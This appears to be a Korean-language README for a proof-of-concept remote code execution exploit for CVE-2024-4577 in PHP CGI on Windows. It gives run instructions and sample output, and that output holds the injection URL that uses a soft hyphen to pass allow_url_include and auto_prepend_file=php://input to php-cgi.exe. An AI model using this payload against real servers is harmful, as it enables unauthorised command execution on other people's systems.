
PHP <8.2.15 (Windows)의 중요한 취약점에 대한 개념 증명 RCE 익스플로잇으로, 공격자가 임의의 명령을 실행할 수 있습니다.
PHP의 CGI 모드에서 공격자가 URL 매개변수를 조작하여 임의 명령을 실행할 수 있는 심각한 보안 결함이 존재합니다.
스크립트를 실행하기 전에 시스템에 Python 3가 설치되어 있는지 확인하세요. 또한 HTTP 요청 처리를 위해 requests 라이브러리가 필요합니다.
pip을 사용하여 필요한 종속성을 설치할 수 있습니다. pip이 설치되어 있지 않다면 여기의 지침을 따르세요.
requests 라이브러리를 설치합니다:pip install requests
CVE-2024-4577 취약점에 대해 대상 URL을 확인하려면 다음 단계를 따르세요:
python3 exploit.py <target>
예를 들어 http://example.com URL을 테스트하려면 다음을 실행하세요:
python3 exploit.py http://example.com
스크립트는 제공된 대상 URL의 취약점을 테스트하고 결과를 콘솔에 출력합니다. 잠재적 취약점이 발견되었는지 또는 취약점이 발견되지 않았는지를 나타냅니다.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
이 취약점은 Orange Tsai(@orange_8361)에 의해 발견되었습니다.